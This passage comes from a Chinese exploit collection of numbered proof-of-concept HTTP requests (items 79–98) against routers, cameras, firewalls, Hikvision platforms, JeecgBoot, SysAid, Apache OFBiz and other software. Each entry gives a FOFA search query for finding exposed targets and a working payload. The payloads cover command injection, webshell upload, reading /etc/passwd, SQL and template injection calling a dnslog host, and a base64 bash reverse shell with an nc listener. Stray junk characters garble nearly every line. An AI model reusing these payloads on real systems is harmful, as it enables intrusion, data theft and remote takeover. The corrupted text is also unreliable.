GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.17 e5 {) N6 c3 Y2 h) U- x
Host: x.x.x.x' r- S( E+ y" B; e: P" l/ \# M
T- _/ ]' o/ ]2 d
X$ i. h+ q. U3 q3 g& X7 q' j
79. BYTEVALUE 百为流控路由器远程命令执行8 q8 z- S! ^, ^1 i3 i" A
FOFA:BYTEVALUE 智能流控路由器
) u# m5 z8 \. m# M% p/ x& FGET /goform/webRead/open/?path=|id HTTP/1.1. d3 N% \# {3 o$ k4 o2 g
Host:IP' {& S; ~8 |- o+ ]8 p5 @7 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0# Q: h9 J; h, u: `! d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 j0 t# @+ ^4 R8 d# R& H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 b& G* @8 S6 C. b
Accept-Encoding: gzip, deflate
# z' g- q; y. `" a( ~6 nConnection: close
. w6 S4 w$ K2 g$ ~0 v9 hUpgrade-Insecure-Requests: 13 K; Q+ K5 \) S; c4 L6 v* s
2 E+ r% }% K! ]. Z# I9 O- N
+ n; O! z# r) K, P( Y0 I$ w80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' k l4 k% @8 ^( h' |, f7 gFOFA:app="速达软件-公司产品"* a4 H1 ~# \$ ]0 y% n
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1" }" Y2 ~/ L: c" r9 |' g* C
Host: x.x.x.x
) i3 ?; O7 q& y2 R- U2 J8 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ q, q/ N9 ?3 m' x6 C/ i7 ?! T @Content-Length: 27
) e, a; z+ B% T. d: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 z* |$ A( N* U4 _Accept-Encoding: gzip, deflate
! y4 R9 f& W5 Z8 }' HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. q4 ^5 w6 ^7 S, W& v0 R
Connection: close R! l# t& A! A& s
Content-Type: application/octet-stream4 J+ q7 C) C" L4 X6 x
Upgrade-Insecure-Requests: 1; N0 V5 h. t$ d3 o1 c" V+ b
e/ T& l( f3 H0 {2 V+ S
<% out.print("oessqeonylzaf");%>
# H; W* @; @! m q, d8 }: g. E& z) B8 i* X) m
/ @0 \0 P! c- F+ k# M. j/ ?8 U
GET /xykqmfxpoas.jsp HTTP/1.1
( [" ?/ `6 U9 c9 n: kHost: x.x.x.x) U; s( m, d4 K3 G6 t# E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 j1 V c3 p) Q2 c; r" w5 r7 `6 z( yConnection: close# A1 U" |* y* p3 |7 c
Accept-Encoding: gzip
6 ~5 W* x2 k/ z7 \; g# ^/ p9 z
# d' C) d" f8 m [, @% p. T0 D# V
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
# ^/ ?- F+ t& f8 }' D. TFOFA:app="uniview-视频监控"2 Z; S8 h4 k1 M! x: L4 b* A
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.13 W3 \$ w, J: M9 J( D
Host: x.x.x.x, g+ S1 P L3 K% o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 A, w [3 r" v9 k
Connection: close
3 A1 j R, O$ ?( f/ A% u/ J$ L1 A& FAccept-Encoding: gzip, G% l& K0 ]7 _9 Q# q; C
7 g9 O( r* L3 Q3 {" `% b
! L/ b# d7 N) R82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行) E$ Y8 z1 t; d' p7 |
FOFA:app="思福迪-LOGBASE"
. ~5 S1 r `+ X6 G" Z% [POST /bhost/test_qrcode_b HTTP/1.1
G9 j6 u; D) `2 d7 l6 F5 XHost: BaseURL
X9 W) s* m7 n5 \9 bUser-Agent: Go-http-client/1.18 ~2 ^+ `2 l# v0 H5 Q3 z) [5 c
Content-Length: 23
7 r/ [2 q7 [7 VAccept-Encoding: gzip
+ `) ~. Q$ l- p3 ]3 t/ {, Q9 o# CConnection: close2 P6 }, E1 U& Q9 s9 g
Content-Type: application/x-www-form-urlencoded
* p* ?( u$ k9 f4 s) YReferer: BaseURL
) O, k4 n) x0 R! H
3 ]2 N; ]( D' P( K7 Z' H9 R" G% Pz1=1&z2="|id;"&z3=bhost
" V( f3 L9 J8 x4 @6 d1 }; K4 _8 n
' b' @$ e+ Z$ l1 l# E( T+ r p `+ |# g
83. JeecgBoot testConnection 远程命令执行
, P2 {+ i; W* U9 H3 _FOFA:title=="JeecgBoot 企业级低代码平台") x+ z( U$ R) G* Q5 O6 N
; c& W, X' y4 c) G7 `; y3 Q8 G! H5 h; c
POST /jmreport/testConnection HTTP/1.1
8 q7 H9 ]; ~0 B, d! g% a2 ?Host: x.x.x.x; M, _/ |2 Z1 P3 `$ w* s" W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ y# z7 m1 `3 T. ~. m( g
Connection: close. ?- E6 p5 I" G9 o$ A+ d
Content-Length: 88811 m+ w+ T) W/ ]+ I
Accept-Encoding: gzip
! q) Z) |% y( `# K. \6 UCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
. T C: y: d, M$ x$ V8 }1 {Content-Type: application/json( O3 c5 W( `2 D9 U# \/ m9 G
c* q+ E8 x P+ j
PAYLOAD
! A8 g+ V# s4 h" |$ ?! z- u* T, d% N& J1 }
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入: H @ ~: e1 e7 z0 K0 c
FOFA:title=="JeecgBoot 企业级低代码平台"+ Q/ S+ ], ]( v5 ]- s3 L) B! ~
- Q6 I7 ]7 Y9 D' u, {0 t4 q( o
2 W: j& [1 H6 a$ V% E
o% I# [5 S; PPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
; S; k0 N% n# o6 [( J' HHost: 192.168.40.130:80808 D8 t( j9 q: v% z$ }! I$ {! b
User-Agent: curl/7.88.1
- `& Q Y* _7 J' ~1 s x- ?Content-Length: 156
- Y1 r+ V* N6 bAccept: */*
, j3 T$ a- P- D: Q% ?+ k7 Z, z) |Connection: close8 ^3 l& R9 T. v' G
Content-Type: application/json: {: L* `. _8 ? O5 ]/ Q: S$ v4 E
Accept-Encoding: gzip- b& R4 ]( Y$ H& R
. H4 a6 S/ y8 ?! o0 u{
. e& p) ?5 z6 b& E" k "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
1 S6 A7 U1 i4 l "type": "0"& P, O7 h1 E5 \- L* `# M. f0 t8 A
}
P1 K4 V5 m1 Z, v- u
& p( U+ |2 B3 w x
2 X! l; f! P$ o2 R- O8 Z; L! m$ O85. SysAid On-premise< 23.3.36远程代码执行
. e* N, Y3 \0 X% ^7 b$ pCVE-2023-47246
2 E! L v1 O( {4 |FOFA:body="sysaid-logo-dark-green.png" & x E7 x0 D" u% e" D2 @; ?
EXP数据包如下,注入哥斯拉马
" k, Q; r. F$ }POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
& d, c* G, y; g' F i* i1 G& t/ uHost: x.x.x.x
# q# v% c+ K0 G) }' {4 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) W+ l2 N; X( l- p/ c$ LContent-Type: application/octet-stream6 e5 f/ t2 s+ ~: u( ?
Accept-Encoding: gzip
# L' U5 s: K& ^9 o! m3 v# U
( I. W4 E8 g8 e: U1 E# N6 A+ MPAYLOAD; [& C3 f) w+ Y! N9 Q
, r( O$ c1 y0 V' N回显URL:http://x.x.x.x/userfiles/index.jsp
1 `3 ]/ e0 ~4 L" {
- H: [. K% |+ ~3 P! L, X# J86. 日本tosei自助洗衣机RCE; f- Q) D( m' m5 Z1 u, N
FOFA:body="tosei_login_check.php"7 I: B9 N: k# }
POST /cgi-bin/network_test.php HTTP/1.17 G% \" _0 U& B$ d) I, |. I: ~6 _2 E
Host: x.x.x.x
9 q) M% R0 x! O$ f8 X. @6 PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; P/ ]+ v% |- c* j" U
Connection: close
$ p. S% I% Q4 v% }' m7 |0 e+ RContent-Length: 44* M7 k+ i8 p e* w
Accept: */*
* S# P6 {! z+ lAccept-Encoding: gzip! B0 ?$ e4 h* L4 x
Accept-Language: en. M# A; _& ?4 H" k7 U1 g' }
Content-Type: application/x-www-form-urlencoded
( _- w3 k) c. u2 h% l1 l( J4 y0 F3 G/ N, v7 r. k3 p
host=%0acat${IFS}/etc/passwd%0a&command=ping
- I* w5 P! B% D9 K( \3 \
7 W) O0 H) E) l+ b6 V1 Y- P/ `- E
87. 安恒明御安全网关aaa_local_web_preview文件上传
- p9 b( @# H' b2 u7 u1 ?; {0 T9 b; JFOFA:title="明御安全网关"6 }, l0 a9 p. | j* s( v) x$ a4 N0 n1 t
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1/ Z' N" S; }9 a( |: _
Host: X.X.X.X7 `' x5 a J% B6 F! L# {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ ?) Z4 D2 v; sConnection: close
. N' q+ a \1 h$ mContent-Length: 198
7 i' B3 E, _9 Z: k% DAccept-Encoding: gzip
1 h3 Z$ {/ g; m4 J3 z. BContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd$ {2 V* }/ C; S" K; ?$ E* w T
. B8 Y( j7 W3 P( p
--qqobiandqgawlxodfiisporjwravxtvd5 E# M6 k. j& j0 j. g) S, F( J
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"3 u0 b! y7 `4 U8 V+ Q
Content-Type: text/plain
" \. P# G' G+ s. [2 O
' e0 Z! ?8 F7 F: q& h$ q2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) s& U" O! W5 g% t$ Y% i3 M. N--qqobiandqgawlxodfiisporjwravxtvd--3 _0 e2 ?# r' K+ D* j: q: O* g
9 r9 o6 W5 \; ~
1 U3 Y5 ~/ E5 Q5 s A/jfhatuwe.php) T+ k/ _$ D' C! B# N
* I7 k. ?1 P1 L; \! w" q9 h
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行/ v1 X4 f2 O% M4 @2 e
FOFA:title="明御安全网关"
+ e; m7 T F7 o# ?5 [7 pGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
9 K3 r, y, ^. ]( Y7 j' V6 jHost: x.x.x.xx.x.x.x
. d/ t. I- {" O- r) KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 S6 L2 B: p/ G) E" R& P: tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# z5 ^# A6 M3 _2 U$ b t, c% K, v& }' AAccept-Encoding: gzip, deflate0 m7 \* G) c) k$ }- ~' D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ z3 p9 m3 a2 o$ b; u8 ? @: qConnection: close
3 U, m! r' }; w$ G) U% g1 R6 g8 @1 f8 ?* H' L
1 N- Z: {9 J! I6 w7 c/astdfkhl.php# t0 G8 y3 _: r# _+ i2 U
+ ^, Q, ^- }; [1 K; d0 J1 j; ^$ }% U89. 致远互联FE协作办公平台editflow_manager存在sql注入2 P8 S2 z* a. @5 W) y
FOFA:title="FE协作办公平台" || body="li_plugins_download"
$ l; E9 y, `: [5 I+ v. {POST /sysform/003/editflow_manager.js%70 HTTP/1.1
/ s$ T+ y" u7 U" Q/ @0 y! GHost: x.x.x.x g) p7 _/ U) Z* S) w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 u2 J: a: h J/ S) W3 i9 I
Connection: close/ q* D" c' i, {0 L
Content-Length: 410 W, O+ k; H5 J6 \
Content-Type: application/x-www-form-urlencoded
5 |& ?* `5 N0 c! w* b$ J' L( _7 `Accept-Encoding: gzip0 a8 P$ m. r7 ?
9 h' \1 s1 y6 _, }8 _* a! ?; ?option=2&GUID=-1'+union+select+111*222--+* h$ j; d; ]+ \8 j8 V) ~
' ]9 I0 S& F- {3 t; _' G a* X
, \0 L0 U- K) l6 I4 w
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
$ m: E* ^4 d4 _, J8 lFOFA:icon_hash="-1830859634"0 y) N8 _0 n& z6 `0 b! K r
POST /php/ping.php HTTP/1.1
+ Q' @" v+ X7 o1 k2 i( K: z1 H; K. R" {+ VHost: x.x.x.x, H6 o# d/ \0 p2 s* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0) q2 {4 d$ A! a' W, [2 p; X1 }: T
Content-Length: 51# S, W h/ A; Y3 r
Accept: application/json, text/javascript, */*; q=0.018 v- `! {! }. l8 T: R/ ^' j. W5 Z0 p
Accept-Encoding: gzip, deflate( @$ |) C% E; K( i$ a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- K u* L* N& \Connection: close# G% T3 E3 e, T- L5 q, [2 ]
Content-Type: application/x-www-form-urlencoded
+ n% {% J/ A6 v, C+ rX-Requested-With: XMLHttpRequest
) A% ~& c2 |+ z' ]* Q- g- t [
9 V/ w V# i8 } Djsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
( e3 ^1 W q* O, K' t3 Q
- Y9 N/ Z; U: Z* B5 w( m7 c
2 l" z3 C. B- g, b' [7 I91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: r4 F7 J2 ]9 J5 B
FOFA:title="综合安防管理平台" q/ {% v4 S/ _4 y7 J6 ^
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1 ?/ Z9 o5 k3 d; M$ x' c2 c
Host: your-ip, [8 b# p( E& T; f( S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& a, B, c' \; V. b$ x5 |% g- M
Accept-Encoding: gzip, deflate- B& @: F" x* }' ?! Q
Accept: */*! k6 }9 f; [/ O* d
Connection: keep-alive
I; W: u# f/ B8 @
/ N+ [/ I" P0 u8 G9 S/ [
6 O( ?/ n4 h: F5 j8 W0 `6 r* c% J. f$ n$ P
92. 海康威视运行管理中心session命令执行
3 Y( a( J5 G+ lFastjson命令执行
8 A. @6 J a ?1 Zhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"' }+ R3 G5 |+ G% q2 W; S
POST /center/api/session HTTP/1.15 _! \- O: o% I, }$ p5 n- r! M% H
Host:. h+ m; s# U3 n, t+ u
Accept: application/json, text/plain, */*& U4 e, I3 c. h1 ~8 u/ S2 p Y3 v
Accept-Encoding: gzip, deflate2 S0 T- p( z6 }1 V- Y- r
X-Requested-With: XMLHttpRequest
3 E0 n: v2 V; \& d6 r. f0 [: Q$ MContent-Type: application/json;charset=UTF-8+ C, m4 Q7 r) h1 D
X-Language-Type: zh_CN, {5 b1 B" P0 X Q
Testcmd: echo test
$ d# t! `/ N! N. dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36( X8 X5 n# g2 n+ N
Accept-Language: zh-CN,zh;q=0.9! F5 J$ |$ f, a4 v
Content-Length: 5778
( X/ K3 g% W( M7 F* _
5 u0 h6 y# Q U' YPAYLOAD
; k5 u( L- \6 _/ G1 X# T4 j& G3 r
% g/ E$ U5 a# C# r- c* O' w6 I0 G! \; a% l( ]
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传% m) V5 m5 y- l4 r- l* b0 M Z
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 x. N& R' Z L/ n: H- FPOST /?g=app_av_import_save HTTP/1.1
4 i9 V8 `- V. ]* FHost: x.x.x.x
+ V- v2 V9 m6 i6 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx" Z- ~/ _. j9 W2 c, \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 S5 r% R; k* e3 L1 C
) d% b! F! w5 l. y$ U8 o, T5 R------WebKitFormBoundarykcbkgdfx/ t- {- R3 W; Q/ k0 W8 x1 @& t1 @: s
Content-Disposition: form-data; name="MAX_FILE_SIZE"* U9 z" v! l# a w: n
7 {1 f5 r5 d" I: u3 t10000000" ]8 C' m; B: m- u8 D
------WebKitFormBoundarykcbkgdfx4 E7 m" n; P' ^6 X' U5 ^
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
/ A3 Q& C) U* y) R' V# l( bContent-Type: text/plain+ T& E* S* t% a# r0 H! H P8 H* f% l
5 [1 ?3 s- s7 M i8 `' w' G4 J
wagletqrkwrddkthtulxsqrphulnknxa
6 `0 x8 F' Y4 y6 y/ \3 [- o------WebKitFormBoundarykcbkgdfx
+ l2 {2 [+ |, n. h; `0 nContent-Disposition: form-data; name="submit_post"- @' P" D2 V# O4 ` Y4 S" U; {$ d
* K. }+ J' M0 G( x& K2 r
obj_app_upfile i' s$ X& |1 h! I$ K
------WebKitFormBoundarykcbkgdfx: ?# p: F9 r, t- q/ ]; b
Content-Disposition: form-data; name="__hash__"; [# N- K7 {+ k/ Y( Q( d
5 p; }4 J! b! ?; _6 h0b9d6b1ab7479ab69d9f71b05e0e9445; C ~* p) e) j h+ v8 d
------WebKitFormBoundarykcbkgdfx--
% U# ]. h0 T! N7 W" K: N$ d
& x: b+ _: R0 [. L
, E) j" A3 Q p& A; g" HGET /attachements/xlskxknxa.txt HTTP/1.1( h& t7 G/ f. F( K
Host: xx.xx.xx.xx
2 l# P; y+ b& N5 ~& o0 XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- |% R. f% g: E( F y
8 l0 ]$ G9 `* j( K
" a+ D1 S9 N4 i94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传0 J" Z+ x- o9 M4 S' s) \9 e
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
% l6 f! K- A7 u6 y4 T* tPOST /?g=obj_area_import_save HTTP/1.1& X3 [; X3 l/ ?+ |
Host: x.x.x.x
2 \3 e) }- M- A, N# SContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
4 q* `" x+ I9 f# l0 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 m8 s, q K" B# n; K
4 h' D& w- l" p% N3 I------WebKitFormBoundarybqvzqvmt# L+ s5 Q+ Y6 |$ v- x6 o
Content-Disposition: form-data; name="MAX_FILE_SIZE"6 p# z" R0 P! g+ W5 O% I
" u0 @0 N0 t5 ~0 o; n. l- ~3 h/ y1 I
10000000
, @/ ]! r% p, F------WebKitFormBoundarybqvzqvmt4 Z3 D$ M) a0 _$ c6 b0 s
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"0 G8 v& |5 p3 e0 p4 D
Content-Type: text/plain
6 K7 M" n/ l1 {9 d" k4 P6 ^; a
8 p- h/ j4 A' E8 D$ T) o; zpxplitttsrjnyoafavcajwkvhxindhmu
$ T" ?* s p1 [' l------WebKitFormBoundarybqvzqvmt( g, f; {- N. a1 r( r. \
Content-Disposition: form-data; name="submit_post"
* ~" \7 _+ F( V
?9 D6 T3 M9 j& _8 Mobj_app_upfile
3 x* _7 u' | V" m! r* z6 n------WebKitFormBoundarybqvzqvmt
7 {: [: M6 L5 Y. [% KContent-Disposition: form-data; name="__hash__"
: ]2 o6 k; d3 M! ~0 A X& ~4 O4 x0 o
0b9d6b1ab7479ab69d9f71b05e0e94450 m8 n8 q4 q' D& J
------WebKitFormBoundarybqvzqvmt--
& B& f4 x6 Z: S2 `) E3 \% B# E9 u' N$ F b& V3 ^0 C$ D1 v
! R5 U% J1 |; ]" X1 `' \
0 m7 g0 ^/ M# ?( B& s, Z8 A fGET /attachements/xlskxknxa.txt HTTP/1.1* ]+ \' G; z4 M* P2 G
Host: xx.xx.xx.xx& B) a$ [/ K' J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 b( D4 U Z7 S& v
$ _3 d& \% R5 [9 `' ]- A8 r; s, Z2 \! G5 i0 U0 @( W+ @; m. P" S
; f1 O P- }6 C/ ~95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行' _5 Z- K6 a( Q
CVE-2023-49070
" h0 H* h* Q/ p7 GFOFA:app="Apache_OFBiz"' X9 n; ~1 L9 i4 N3 }2 b
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1; l$ x2 g2 f. L, s E. U
Host: x.x.x.x
7 o. X& H( P( @- ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ t3 p/ \1 C0 ?1 J$ Z/ ~" y7 D1 w4 `
Connection: close
7 r; x! Q- S7 y2 \Content-Length: 889* @! X ^9 ?* ^9 S( G. b" s
Content-Type: application/xml
$ Z7 R; s. ~1 s4 l: V: H2 vAccept-Encoding: gzip
. D. I3 J* a8 e3 P/ C! u1 o4 U7 ]1 n6 M5 _. ^
<?xml version="1.0"?>
+ x( F" V$ l7 u+ C9 {' _<methodCall>0 j1 p. X, i( m6 Z3 O
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; w6 {' v/ j% H, L$ s m, }% h
<params>
& U0 L3 I& l$ g ]. h& b; j/ y <param>
; ?- u$ I( x F <value>
/ h5 a' A) J) Q1 [& b2 N& \ <struct>6 C4 O0 X3 B7 t# C+ G
<member>' d2 v; |2 [0 n' M, V/ X
<name>test</name>
5 A% s" E" b2 Q$ u <value>
7 g. @( H! z6 D& E& i <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>2 R8 D6 `! E+ }0 M1 k
</value>
& e0 m. E6 b6 l# g( j% e </member>
& ~ g$ } @" g% ^( a4 Y( J& m7 L </struct>
# x# C" ?5 X' @# ^ </value>
% O! ~& z+ \# _7 G' D- q </param>) Y, K" P y* |: }/ q9 h
</params>) B1 j8 x9 [. _0 m1 J( }- I' p
</methodCall>8 n8 p& I3 @' h8 X
1 t# P0 a$ |/ o3 \
, z7 v& Q; ^( L. B; p用ysoserial生成payload6 H1 U( _8 V, l
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"/ l5 S+ G6 G& I% p$ B2 Y9 A; \6 U N
! ~* m9 A d/ V {
E* ^, U8 s: }% R/ i$ h0 v3 m将生成的payload替换到上面的POC: A" |' u- ~% ~" a& b
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1' `5 d3 `; J. Z3 L& B# w
Host: 192.168.40.130:8443; ~# `1 _( n3 ^) N% }- i) A" M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! t+ U; G/ g5 D: s% _$ k4 {Connection: close" u+ n3 W4 o h+ ^9 {
Content-Length: 889
, ]8 p/ H% o3 z2 X* F1 a1 ~Content-Type: application/xml* t1 y' O3 F6 ^# _* W: x
Accept-Encoding: gzip
% X1 B# I9 ~, w3 }4 K9 u, H& S; |+ ?2 P
PAYLOAD
9 D2 m* l8 h: C" [9 l
& }. \* `: B; R2 h, y96. Apache OFBiz 18.12.11 groovy 远程代码执行7 }/ e5 t5 ]0 M
FOFA:app="Apache_OFBiz"$ q8 q2 N+ Y' I# Z b% ^2 m
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
4 y* _! x# W+ w) qHost: localhost:8443
6 l. N" w/ z7 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 Z& W* u+ Z |9 t9 R& g( G3 D; r, EAccept: */*
9 B$ Z+ k6 f( i6 I( Q) DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# ^* |9 y8 X* w5 f9 G) q5 w1 H3 NContent-Type: application/x-www-form-urlencoded, H, r6 q0 r, e" m$ R _
Content-Length: 55
$ g4 \8 t/ @7 v' C+ N$ r: s& C5 O8 p% I' c) Z, f2 ?
groovyProgram=throw+new+Exception('id'.execute().text);" w* [- Y! G3 o z+ m
0 f" _3 N3 w$ z9 ^1 k7 L/ z
7 p9 Z9 C. e5 t0 b2 P1 E$ _反弹shell
6 \5 H* o# w5 h# K5 k) W3 r在kali上启动一个监听
u/ D9 |, D! }nc -lvp 7777
! }. u4 U" y1 c q
) H( V9 U W& F4 Y' g& p. \" z$ jPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
' N; |9 R5 n1 x0 }Host: 192.168.40.130:8443
: [& K/ P( Y2 q" ~5 R' \7 z) P. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 G% E% F' d: g0 @1 W0 b' KAccept: */*0 O9 I d; w+ K I: y! q- y+ S' t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( M4 O2 e# E, ~0 k5 ~
Content-Type: application/x-www-form-urlencoded* a! \2 G/ B: v' L
Content-Length: 71
, f2 Q$ Z7 h3 I* ?/ V! V; X* y. Q* W9 N" ^' B' z+ P
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();6 {6 P7 k: }6 A- v# ]* n) B
7 S9 j8 J( A3 S97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行3 V( c/ Y2 e. |7 j* ^! S# g
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"3 r1 f! R; y/ S. b: i. R* a
GET /passport/login/ HTTP/1.1
3 g6 x/ ]$ N6 y THost: 192.168.40.130:8085
6 a7 ~; w/ m" F2 E; h! FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 _ _1 w, v4 C5 I' C9 d" ^ [8 U
Accept-Encoding: gzip
/ y6 E% p+ X8 f! W) E! x. h% Z6 Y% p7 iConnection: close+ ?9 g6 C& S2 L/ d6 S/ N5 [
Cookie: rememberMe=PAYLOAD. N9 [# r H' @
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"4 I/ X8 W9 ]1 f
% {8 J3 z; a, x- C% O
5 [2 A0 I! u: Z& K$ |* @98. SpiderFlow爬虫平台远程命令执行
( n$ w* x4 K4 K: WCVE-2024-0195
+ d6 L' b# g/ E4 l uFOFA:app="SpiderFlow"$ ^, l( \4 {; A4 W+ F
POST /function/save HTTP/1.1
' H J5 w) v$ A7 s/ E2 aHost: 192.168.40.130:8088% e) p9 `3 M" y+ k6 }2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! W8 p5 C# J# A# e
Connection: close
1 L8 p% n0 t1 IContent-Length: 121& `+ i6 _8 G5 Y5 z* ^; L- m0 J
Accept: */*6 Q: Q' Y. N% }% x: U# }9 d6 q
Accept-Encoding: gzip, deflate. {% {3 R9 s8 S: [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
